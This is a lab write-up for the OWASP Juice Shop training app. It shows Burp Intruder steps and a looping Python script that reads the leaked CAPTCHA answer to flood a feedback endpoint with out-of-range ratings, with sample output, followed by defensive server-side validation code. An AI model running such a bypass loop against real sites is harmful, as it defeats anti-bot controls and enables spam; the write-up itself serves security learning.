OWASP Juice Shop Learning (3)
Unlocking Zero Stars ★ and CAPTCHA Bypass ★★★
Open the side menu -> Customer Feedback; the customer feedback form is displayed.
Open Burp Suite Professional and click Proxy -> Intercept -> Open Browser to launch the built-in browser.
In the built-in browser open http://192.168.31.203/#/contact. Burp intercepts every request of the browser session and the Forward button becomes active; keep clicking Forward to let all requests through, and the built-in browser renders the customer feedback form normally.
In the built-in browser fill in the feedback form and click Submit, then click Forward repeatedly in Burp again.
Click HTTP history in Burp; we can see that Burp has recorded the complete page interaction.
Looking through it, record 55 shows the browser calling the /api/Feedbacks endpoint with a POST request to submit the feedback data that was entered.
The POST body is {"captchaId":16,"captcha":"196","comment":"dislike (anonymous)","rating":2}. We can forge part of this data and see how the server reacts.
Click the Actions button, then Send to Intruder.
Click Intruder -> Positions; the Payload Positions panel shows the POST /api/Feedbacks request, and Burp has automatically wrapped every variable in § markers (green).
We first forge the "rating" value: click Clear § to remove all payload positions.
Then select the 2 in "rating":2 (I don't know why the selection shifts a few characters to the left) and click Add §, making sure the 2 is wrapped in § markers, i.e. "rating":§2§.
Click Payloads -> Payload type and choose Numbers.
Choose Sequential, from 0 to 10 with step 1, then click Start attack.
Burp replays the earlier POST /api/Feedbacks request, iterating the "rating" value from 0 to 10.
This unlocks Zero Stars ★ and CAPTCHA Bypass ★★★.
Analysing the feedback page interaction, the main flow is:
- GET /rest/captcha/ to obtain a CAPTCHA.
- POST /api/Feedbacks/ to submit the feedback together with the CAPTCHA.
The following Python script simulates calling these two endpoints:
import json, random, time
import requests

# Headers copied from the captured browser request. Host and Content-Length are left out:
# requests sets both itself, and a stale hard-coded Content-Length would truncate the body.
headers = {'Accept': 'application/json, text/plain, */*',
           'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36',
           'Content-Type': 'application/json', 'Origin': 'http://192.168.31.203', 'Referer': 'http://192.168.31.203/',
           'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'zh-CN,zh;q=0.9',
           'Cookie': 'language=en; cookieconsent_status=dismiss', 'Connection': 'close'}
captcha_url = "http://192.168.31.203/rest/captcha/"
Feedbacks_url = "http://192.168.31.203/api/Feedbacks/"

while True:
    print("---", time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()))
    # The captcha endpoint returns the answer together with the captchaId
    req = requests.get(captcha_url).json()
    # print(req['captchaId'], req['answer'])
    rating = random.randint(0, 10)   # 0 and anything above 5 lie outside the form's range
    datas = json.dumps({'captchaId': req['captchaId'], 'captcha': req['answer'],
                        'comment': '1111111111111111111111111111111 (anonymous)', 'rating': rating})
    byte_data = datas.encode('utf-8')
    # print(datas)
    req = requests.post(Feedbacks_url, data=byte_data, headers=headers)
    print(req.text)
Running the script gives:
>python captcha.py
--- 2022-04-17 23:50:48
{"status":"success","data":{"id":381,"comment":"1111111111111111111111111111111 (hangzhou)","rating":5,"updatedAt":"2022-04-17T15:50:43.597Z","createdAt":"2022-04-17T15:50:43.597Z","UserId":null}}
--- 2022-04-17 23:50:48
{"status":"success","data":{"id":382,"comment":"1111111111111111111111111111111 (hangzhou)","rating":6,"updatedAt":"2022-04-17T15:50:43.702Z","createdAt":"2022-04-17T15:50:43.702Z","UserId":null}}
--- 2022-04-17 23:50:48
{"status":"success","data":{"id":383,"comment":"1111111111111111111111111111111 (hangzhou)","rating":2,"updatedAt":"2022-04-17T15:50:43.823Z","createdAt":"2022-04-17T15:50:43.823Z","UserId":null}}
--- 2022-04-17 23:50:48
{"status":"success","data":{"id":384,"comment":"1111111111111111111111111111111 (hangzhou)","rating":9,"updatedAt":"2022-04-17T15:50:43.889Z","createdAt":"2022-04-17T15:50:43.889Z","UserId":null}}
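The output above shows the two server-side gaps this challenge exercises: the API stores whatever integer arrives in rating (0 and 9 are accepted although the form only offers 1 to 5), and /rest/captcha/ hands the answer to the client together with the captchaId, so the CAPTCHA proves nothing. The following is an added example, not Juice Shop's code and not the author's script, of the checks a feedback endpoint should apply on the server: an in-memory CaptchaStore (a hypothetical class) that issues a challenge without its answer and consumes each captchaId on first use, and validate_feedback, which enforces the rating range and comment length before the CAPTCHA is checked. The rating bounds, comment limit and TTL are assumed values.

```python
import random
import secrets
import time

MIN_RATING, MAX_RATING = 1, 5     # assumed bounds: what the feedback form offers
MAX_COMMENT_LEN = 160             # assumed limit


class CaptchaStore:
    """Hypothetical in-memory CAPTCHA issuer: the answer never leaves the server."""

    def __init__(self, ttl_seconds=300):
        self._pending = {}        # captchaId -> (answer, expires_at)
        self._ttl = ttl_seconds
        self._next_id = 1

    def issue(self, now=None, challenge=None):
        """Return only {"captchaId", "captcha"}; `challenge` fixes the operands for tests."""
        now = time.time() if now is None else now
        a, b = challenge if challenge else (random.randint(1, 9), random.randint(1, 9))
        captcha_id = self._next_id
        self._next_id += 1
        self._pending[captcha_id] = (str(a + b), now + self._ttl)
        return {"captchaId": captcha_id, "captcha": f"{a}+{b}"}

    def verify(self, captcha_id, submitted, now=None):
        """Single-use, time-limited, constant-time comparison of the submitted answer."""
        now = time.time() if now is None else now
        entry = self._pending.pop(captcha_id, None)   # consumed whether or not it matches
        if entry is None:
            return False
        answer, expires_at = entry
        if now > expires_at:
            return False
        return secrets.compare_digest(answer.encode(), str(submitted).encode())


def validate_feedback(payload, store, now=None):
    """Checks a feedback POST body must pass before anything is stored.

    Returns (ok, reason). Cheap field checks run first so that a malformed
    request does not burn a still-valid CAPTCHA.
    """
    if not isinstance(payload, dict):
        return False, "body must be a JSON object"
    rating = payload.get("rating")
    if isinstance(rating, bool) or not isinstance(rating, int):   # bool is an int subclass
        return False, "rating must be an integer"
    if not MIN_RATING <= rating <= MAX_RATING:
        return False, "rating out of range"
    comment = payload.get("comment")
    if not isinstance(comment, str) or not comment.strip() or len(comment) > MAX_COMMENT_LEN:
        return False, "comment missing or too long"
    if not store.verify(payload.get("captchaId"), payload.get("captcha"), now=now):
        return False, "captcha failed"
    return True, "ok"


if __name__ == "__main__":
    store = CaptchaStore()
    issued = store.issue()                       # what the client receives: no "answer" field
    print("issued:", issued)
    # Constructed request shaped like the captured POST body, with a zero rating
    bad = {"captchaId": issued["captchaId"], "captcha": "0",
           "comment": "dislike (anonymous)", "rating": 0}
    print(validate_feedback(bad, store))         # (False, 'rating out of range')
```

The order of checks matters for the replay case: because the rating and comment are validated first, a request rejected for a bad rating leaves its captchaId unconsumed, while a request that reaches verify() consumes it even on a wrong answer, so a captured captchaId cannot be reused for a second submission.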